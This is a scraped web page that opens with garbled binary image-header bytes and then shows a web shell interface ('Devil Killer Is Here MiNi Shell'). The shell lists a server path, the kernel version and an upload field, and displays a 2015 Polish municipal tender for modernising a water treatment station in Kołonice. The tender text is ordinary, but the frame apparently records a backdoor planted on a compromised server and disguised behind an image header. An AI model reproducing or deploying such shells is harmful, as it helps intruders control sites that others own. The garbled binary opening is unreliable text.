JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150119/7297-N-2015.html

<p class="kh_header"><b>Baligród: Modernizacja (rozbudowa i przebudowa) istniejącego budynku technologicznego Stacji Uzdatniania Wody o wydajności Qśrd = 390 m3/d, na działce nr ewid. 57/3 w miejscowości Kołonice</b><br>
<b>Numer ogłoszenia: 7297 - 2015; data zamieszczenia: 19.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Baligród , Plac Wolności 13, 38-606 Baligród, woj. podkarpackie, tel. 013 4684077, faks 013 4684077.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.baligrod.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja (rozbudowa i przebudowa) istniejącego budynku technologicznego Stacji Uzdatniania Wody o wydajności Qśrd = 390 m3/d, na działce nr ewid. 57/3 w miejscowości Kołonice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane związane z realizacją zadania pn.: Modernizacja (rozbudowa i przebudowa) istniejącego budynku technologicznego Stacji Uzdatniania Wody o wydajności Qśrd = 390 m3/d, na działce nr ewid. 57/3 w miejscowości Kołonice. 2. Inwestycja współfinansowana jest ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich na lata 2007-2013; w ramach Programu, oś 3 Jakość życia na obszarach wiejskich i różnicowanie gospodarki wiejskiej, działanie 321 Podstawowe usługi dla gospodarki i ludności wiejskiej. 3. Roboty budowlane objęte zamówieniem realizowane są na podstawie ostatecznej decyzji wydanej przez Starostę Leskiego Nr AB.6740.4.16.2012 z dnia 05.07.2012 r., która stała się ostateczna w dniu 23.07.2012 r. 4. Inwestycja zlokalizowana jest na działce nr 57/3 w miejscowości Kołonice, gmina Baligród. 5. Opis przedmiotu zamówienia określa: projekt budowlany z podziałem na branże, przedmiar robót dla poszczególnych branż oraz specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiące załączniki do SIWZ. Zakres robót obejmuje branżę budowlaną, branżę technologiczno - sanitarną i branżę elektryczną i AKPiA. 6. W ramach modernizacji, która obejmuje rozbudowę i przebudowę istniejącego budynku technologicznego Stacji Uzdatniania Wody w miejscowości Kołonice przewiduje się roboty budowlane związane w szczególności z:
6.1. branżą architektoniczno - budowlaną, której ogólny zakres robót to: a)	roboty rozbiórkowe zewnętrzne i wewnętrzne, obejmujące: skucie ścian pod drzwi zewnętrzne; skucie skorodowanych, zagrzybionych tynków i ścian na zewnątrz budynków; rozbiórkę uszkodzonych elementów kominów; demontaż wszystkich okien i drzwi zewnętrznych; demontaż odeskowania ścian szczytowych poddasza; demontaż systemu odprowadzania wód opadowych z połaci dachowej; demontaż instalacji odgromowej; demontaż płyt chodnikowych dookoła budynku; skucie posadzek w pomieszczeniach SUW; skucie płytek w pomieszczeniach hali urządzeń; skucie skorodowanych, zagrzybionych tynków i ścian wewnątrz budynku; wykucie posadzek oraz wykonanie zagłębień dla wanien ochronnych i kanałów technologicznych w hali urządzeń; demontaż drzwi wewnętrznych; wynoszenie z budynku i wywóz materiałów pochodzących z rozbiórki. b) roboty żelbetowe i murowe, obejmujące: przygotowanie i montaż zbrojenia prętami okrągłymi żebrowanymi; wykonanie deskowania i betonowania wanien ochronnych; wykonanie ścianek działowych gr. 12 mm z pianobetonu; uzupełnienie ubytków ścian powstałych przy wybiciu otworów pod drzwi zewnętrzne; osadzenie ościeżnic drzwiowych i okiennych;osadzenie kratek wentylacyjnych i innych elementów murowanych. c) roboty ziemne obejmujące wykopy i zasypki przy odkopywaniu fundamentów budynku oraz rurociągów technologicznych; d) roboty izolacyjne, obejmujące: docieplenie ścian zewnętrznych; docieplenie fundamentów w strefie przemarzania; wykonanie izolacji wilgotnościowej pionowej fundamentów; docieplenie stropu. e) roboty obejmujące wykonanie posadzek z płytek ceramicznych w pomieszczeniach oraz z żywicy epoksydowej; f) roboty obejmujące wykonanie tynków wewnętrznych i okładzin ścian; g) roboty malarskie obejmujące malowanie tynków wewnętrznych ścian i sufitów. h) roboty obejmujące wymianę i montaż okien z profili PCV 5 - komorowych; i) roboty ślusarskie obejmujące wykonanie i montaż stolarki drzwiowej wewnętrznej  i zewnętrznej. 6.2. branża technologiczno - sanitarna, której zakres to roboty związane z montażem urządzeń i instalacji technologicznych obejmujących technologię uzdatniania wody, instalację sanitarne w budynku oraz sieci sanitarne międzyobiektowe. Ogólny zakres robót to : a) roboty przygotowawcze: przeprowadzenie obliczeń i pomiarów niezbędnych do szczegółowego wytyczenia robót; zatwierdzenie u Inżyniera propozycji dostaw materiałów; dostarczenie na teren budowy niezbędnych materiałów, urządzeń i urzetu budowlanego; b) roboty demontażowe: demontaż istniejących urządzeń i instalacji. c) roboty montażowe: montaż urządzeń i instalacji; montaż wyposażenia dodatkowego i urządzeń peryferyjnych; przyłączenia koniecznych mediów do funkcjonowania urządzeń.kontrola jakości urządzeń, przyłączeń oraz pomiary powykonawcze. 6.3.	branża elektryczna i AKPiA, której zakres to roboty związane z montażem urządzeń i instalacji elektrycznej oraz AKPiA i obejmują: a) roboty przygotowawcze: przeprowadzenie obliczeń i pomiarów niezbędnych do szczegółowego wytyczenia robót; zatwierdzenie u Inżyniera propozycji dostaw materiałów; dostarczenie na teren budowy niezbędnych materiałów, urządzeń i urzetu budowlanego; b) roboty demontażowe: demontaż istniejących urządzeń i instalacji. c) roboty montażowe: montaż urządzeń i instalacji: montaż rozdzielnic elektrycznych; montaż instalacji zasilającej i sterowniczej urządzeń technologicznych; montaż instalacji zasilającej i sterowniczej urządzeń wentylacyjnych; montaż i uruchomienie urządzeń pomiarowych; modernizacja instalacji oświetlenia i gniazd wtykowych; wykonanie instalacji uziemiającej wyrównawczej, montaż wyposażenia dodatkowego i urządzeń peryferyjnych.  d) kontrolę jakości urządzeń, połączeń oraz pomiary powykonawcze instalacji elektrycznych. 7. Szczegółowo opis i zakres przedmiotu zamówienia oraz sposób wykonania określa Dokumentacja Projektowa (załącznik Nr 9 do SIWZ), Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych (załącznik Nr 10 do SIWZ) oraz Przedmiary Robót (załącznik Nr 11 do SIWZ). 8. Zamawiający informuje, że zakupił: a) grzejniki o mocy: 1000 W - 3 szt. oraz 2000 W - 1 szt.; b) zestaw filtracyjny typ OFSY 36 - 1 kpl; c) pompę zasilającą typu CR 20-5 -1 szt. W związku z tym ilość (kpl, szt.) zakupionych wyżej wymienionych urządzeń została odjęta od ilości zawartej w Przedmiarze Robót (załącznik nr 11 do SIWZ), natomiast z Projektu Technologiczno - sanitarnego - Opis techniczny (Załącznik nr 9 do SIWZ) i Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych (załącznik nr 10 do SIWZ) ilość zakupionych urządzeń nie została odjęta. Wykonawca przy zakupie wyżej wymienionych urządzeń powinien brać pod uwagę ilość zawartą w Przedmiarze robót. (załącznik nr 11 do SIWZ). 9. Wykonawca winien uwzględnić w wycenie wszystkie elementy zawarte w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych, przedmiarach robót i SIWZ. W przypadku jakichkolwiek rozbieżności pomiędzy dokumentacją a dokumentami pomocniczymi (przedmiarami robót a specyfikacją techniczną wykonania i odbioru robót budowlanych) - przesądzają zapisy dokumentacji projektowej.  10. Jeśli, w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych wskazuje się dla niektórych materiałów, wyrobów i urządzeń nazwy, znaki towarowe lub pochodzenie, to wszystkie użyte nazwy, znaki towarowe, pochodzenie mają tylko znaczenie, że określają minimalne parametry techniczne i jakościowe wyrobów, urządzeń oraz materiałów wymaganych przez Zamawiającego do wykonania przedmiotu zamówienia. Zamawiający dopuszcza możliwość zastosowania innych materiałów, wyrobów i urządzeń, niż wskazane w/w dokumentach z zastrzeżeniem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji (materiały, wyroby i urządzenia równoważne). Wykonawca, który przewiduje stosowanie materiałów, wyrobów i urządzeń równoważnych w stosunku do tych wskazanych w dokumentacji projektowej ma obowiązek wskazać jakie materiały, wyroby lub urządzenia zastosuje. Jakość materiałów, wyrobów i innych urządzeń użytych do wykonania przedmiotu zamówienia musi być zgodna z normami, atestami, świadectwami dopuszczenia do stosowania. Ciężar wykazania tej zgodności spoczywa na Wykonawcy na etapie składania ofert i zatwierdzania wniosków materiałowych. 11. W przypadku, gdy okaże się w toku wykonywania przedmiotu zamówienia, ze dokumentacja projektowa będzie zawierała wady, które uniemożliwiają prawidłowe wykonanie przedmiotu umowy lub zastosowanie materiałów, wyrobów i urządzeń równoważnych wymagać będzie zmiany dokumentacji projektowej, Wykonawca niezwłocznie powiadomi o tym fakcie Zamawiającego i uzyska na tę zmianę zgodę Zamawiającego i projektanta. W przypadkach uzasadnionych rodzajem wprowadzanych zmian, po analizie zaistniałego przypadku i po uzyskaniu stanowiska projektanta oraz inspektora nadzoru, Zamawiający będzie uprawniony do modyfikacji sposobu świadczenia Wykonawcy, w taki sposób aby zrealizowany był cel umowy z zachowaniem obowiązujących przepisów. Wprowadzenie zmian do dokumentacji projektowej oraz odpowiedzialność za całokształt przyjętych rozwiązań spoczywa na Wykonawcy. 12. Zamawiający zastrzega sobie możliwość rezygnacji z zakresu części robót i wykonania robót zamiennych nie wykraczające poza zakres przedmiotu zamówienia. Roboty zamienne będą możliwe, jeżeli ich realizacja: a) nie wykracza poza określony zakres przedmiotu zamówienia i nie wpłynie na zwiększenie wartości wynagrodzenia umownego, a roboty te nie będą zamówieniami dodatkowymi w rozumieniu przepisów ustawy Prawo zamówień publicznych; b) powstanie w wyniku konieczności zastosowania zamiennego równoważnego materiału spełniającego parametry i warunki określone w dokumentacji projektowej (np. z powodu wycofania z produkcji zatwierdzonego w dokumentacji projektowej materiału); c) wpłynie na ulepszenie realizowanego zamówienia i usprawnienie procesu realizacji budowy oraz zapobiegnie powstaniu dużych i nieodwracalnych w skutkach strat dla Zamawiającego aczkolwiek nie wpłynie na zwiększenie wynagrodzenia należytego Wykonawcy z tytułu realizacji przedmiotu umowy. 13. Z uwagi na ryczałtowy rodzaj wynagrodzenia podstawą do opracowania ceny ryczałtowej jest dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót budowlanych. Załączone przedmiary robót służą tylko do uzupełnienia opisu przedmiotu zamówienia i nie są podstawą do wyliczenia ceny. Zgodnie z istotą wynagrodzenia ryczałtowego przedmiar robót do wyliczenia ceny oferty winien sporządzić Wykonawca na podstawie dokumentacji projektowej lub pomiarów z natury. Wykonawca musi przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia.  14. Wykonawca winien przed złożeniem oferty uzyskać pewność, że za oferowaną cenę osiągnie efekt rzeczowy w postaci realizacji całości robót określonych w dokumentacji przetargowej. W tym celu zaleca się, by Wykonawca w procedurze ustalania ceny ofertowej:  a) uwzględnił w cenach jednostkowych robót wyspecyfikowanych w kosztorysie ofertowym wszystkie koszty, w tym m.in. koszty wytworzenia przedmiotu umowy tj. energii elektrycznej, wody, robót przygotowawczych, porządkowych, zagospodarowania placu budowy, utrzymania zaplecza i placu budowy, usuwania ścieków, organizacji zaplecza socjalnego, oświetlenia, dozorowania placu budowy, odwodnienia zaplecza, wywozu odpadów z zaplecza, koszty dopuszczenia do czynnych urządzeń oraz wyposażenia budowli w instalacje i urządzenia techniczne zapewniające możliwość korzystania z nich zgodnie z ich przeznaczeniem, koszty wywozu i utylizacji odpadów powstałych w wyniku realizacji robót, rozruchu (w tym: koszty związane z utrzymaniem komisji rozruchowej, media z zastrzeżeniem, iż koszty mediów, środków chemicznych oraz prądu elektrycznego związanych z przeprowadzeniem prób oraz rozruchu poszczególnych elementów ponosi Wykonawca), badań parametrów i jakości wody, jak również wszelkich opłat związanych z odbiorem robót. Wykonawca w swojej ofercie musi ująć koszty związane tymczasową organizacją ruchu, koszty tymczasowego zajęcia terenu a także koszty wynikające z robót tymczasowych (umocnienie wykopu, odwodnienie wykopów, wywóz urobku), przygotowanie dokumentacji powykonawczej wraz z przygotowaniem geodezyjnego opracowania powykonawczego, koszty prób, badań, dokumentacji, uzgodnień związanych z uzyskaniem przez Zamawiającego decyzji pozwolenia na użytkowanie obiektu, koszty szkolenia personelu Zamawiającego; b) dokonał weryfikacji załączonej do SIWZ dokumentacji. Wszelkie wynikłe wątpliwości winny być wyjaśnione z użyciem procedury określonej w SIWZ. 15. Wykonawca będzie odpowiedzialny za aktualizacje wszelkich uzgodnień, zezwoleń, badań wody, postanowień w trakcie realizacji robót oraz będzie zobowiązany do przygotowania i przekazania dla Zamawiającego dokumentów umożliwiających mu uzyskanie pozwolenia na użytkowanie. 16. Roboty budowlane prowadzone w ramach niniejszego zamówienia nie mogą kolidować w żaden sposób z bieżącym funkcjonowaniem stacji uzdatniania wody oraz nie mogą wpłynąć na pogorszenie parametrów uzdatnionej wody. Uwaga! W trakcie prowadzonych robót związanych z modernizacją (rozbudową i przebudową) stacji uzdatniania wody należy zachować ciągłość dostawy wody do sieci.17. Wymagania stawiane Wykonawcy: a) wymagana jest należyta staranność przy realizacji zobowiązań umowy; b) Wykonawca zobowiązany jest do wykonania robót związanych z przedmiotem zamówienia - zgodnie z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót oraz przedmiarami robót. Wymieniona dokumentacja stanowi załączniki do SIWZ.  c) Wykonawca zobowiązany jest do zapoznania się z przedmiotem zamówienia oraz zawarcia w cenie oferty wszystkich kosztów za roboty niezbędne do prawidłowego ich wykonania. d) Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką budowlaną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzenia robót prowadzonych u Zamawiającego. Wykonawca gwarantuje także wykonanie przedmiotu zamówienia pod kierownictwem osób posiadających wymagane przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie. e) Wykonawca zapewnia materiały i urządzenia niezbędne do wykonania przedmiotu umowy, posiadające aktualne atesty i certyfikaty pozwalające na ich stosowanie. Transport materiałów na plac budowy oraz dostarczenie i eksploatacja maszyn i urządzeń obciążają Wykonawcę. f) Wykonawca zabezpiecza teren robót mając w szczególności na względzie mienie Zamawiającego i własne, w szczególności Wykonawca zobowiązany jest na własny koszt zabezpieczyć zdemontowane urządzenia, sprzęt oraz materiały.  g) Wykonawca w trakcie wykonywania robót ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie przekazanego placu budowy z tytułu prowadzonych robót.  h) Wykonawca zapewnia we własnym zakresie wywóz i utylizację odpadów budowlanych (śmieci, gruz i inne).  i) po zakończeniu robót, ale przed odbiorem końcowym przez Zamawiającego Wykonawca zobowiązany jest do uporządkowania terenu budowy wraz z terenem przyległym i doprowadzenia ich do stanu jaki był przed rozpoczęciem robót.  j) do zakresu Wykonawcy należy opracowanie organizacji ruchu na czas budowy i zapewnienie kompleksowej obsługi geodezyjnej wraz z poniesieniem kosztów z tym związanych (jeżeli taka potrzeba wystąpi). 18. Odbiór końcowy przedmiotu zamówienia odbędzie się po pozytywnym odbiorze technicznym przez Zamawiającego i dostarczeniu sporządzonej przez Wykonawcę dokumentacji powykonawczej oraz wszelkich protokołów i badań, niezbędnych do uzyskania przez Zamawiającego pozwolenia użytkowania. 19. Zamawiający wymaga udzielenia 36 miesięcy gwarancji na wykonany przedmiot zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.33.00.00-9, 45.23.20.00-2, 45.33.10.00-6, 45.25.20.00-8, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca składający oferty zobowiązany jest do wniesienia wadium w wysokości: 15 000,00 zł (słownie: piętnaście tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków w postępowaniu z art. 22 ust. 1 pkt. 1-4 ustawy Pzp - zgodnie ze wzorem jako załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca wykaże, że wykonał w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 (jedną) robotę budowlaną (z podaniem ich rodzaju i wartości, daty i miejsca wykonania) odpowiadających swoim rodzajem robotom budowlanym stanowiący przedmiot zamówienia. Przez takie roboty należy rozumieć modernizację, budowę, rozbudowę lub przebudowę stacji uzdatniania wody o wartości nie mniejszej niż 350 000,00 zł brutto każda potwierdzona dokumentem, że roboty te zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane zgodnie z zasadami sztuki budowlanymi i prawidłowo ukończone. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten powinien spełnić co najmniej jeden z Wykonawców lub wszyscy Wykonawcy wspólnie.
Ocena spełnienia warunku odbywać się będzie w oparciu o analizę oświadczeń i dokumentów złożonych we wniosku na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków w postępowaniu z art. 22 ust. 1 pkt. 1-4 ustawy Pzp - zgodnie ze wzorem jako załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj. :
a) jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, zgodnie z przepisami ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zmówienia w zakresie pełnienia funkcji Kierownika Robót Budowlanych, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b) jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, z przepisami ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zmówienia w zakresie pełnienia funkcji Kierownika Robót Sanitarnych, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
c ) jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych elektroenergetycznych, z przepisami ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zmówienia w zakresie pełnienia funkcji Kierownika Robót Elektrycznych i AKPiA, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten powinien spełnić co najmniej jeden z Wykonawców lub wszyscy Wykonawcy wspólnie.
Ocena spełnienia warunku odbywać się będzie w oparciu o analizę oświadczeń i dokumentów złożonych we wniosku na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, że posiada:
a) opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wysokości co najmniej 350 000,00 zł (słownie: trzysta pięćdziesiąt tysięcy złotych);
b) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, na kwotę nie mniejszą niż 350 000,00 zł (słownie: trzysta pięćdziesiąt tysięcy złotych).
W przypadku, gdy złożone przez Wykonawców dokumenty zawierające dane w innych walutach niż określono to w treści SIWZ,  Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP dla danej waluty z dnia wystawienia dokumentu.  Jeżeli w dniu wystawienia dokumentu kurs danej waluty nie był ogłaszany przez NBP, obowiązuje kurs ogłoszony bezpośrednio przed tym dniem.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten powinien spełnić co najmniej jeden z Wykonawców lub wszyscy Wykonawcy wspólnie.
Ocena spełnienia warunku odbywać się będzie w oparciu o analizę oświadczeń i dokumentów złożonych we wniosku na zasadzie spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
